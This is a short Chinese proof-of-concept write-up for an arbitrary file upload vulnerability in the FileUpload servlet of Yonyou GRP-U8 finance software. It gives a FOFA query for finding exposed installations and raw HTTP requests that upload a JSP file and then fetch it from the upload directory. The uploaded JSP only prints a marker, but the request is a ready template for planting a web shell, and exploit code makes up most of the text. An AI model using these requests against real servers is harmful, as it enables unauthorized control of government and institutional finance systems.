用友GRP-U8 FileUpload任意文件上传漏洞
一、漏洞简介
用友GRP-U8行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 FileUpload接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
二、影响版本
- 用友GRP-U8
三、资产测绘
- fofa
app="用友-GRP-U8" - 特征
四、漏洞复现
POST /servlet/FileUpload?fileName=stc.jsp&actionID=update HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Content-Type: multipart/form-data; boundary=---------------------------32840991842344344364451981273
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 25
Connection: close
<% out.println("Tide");%>
上传文件位置
GET /R9iPortal/upload/stc.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close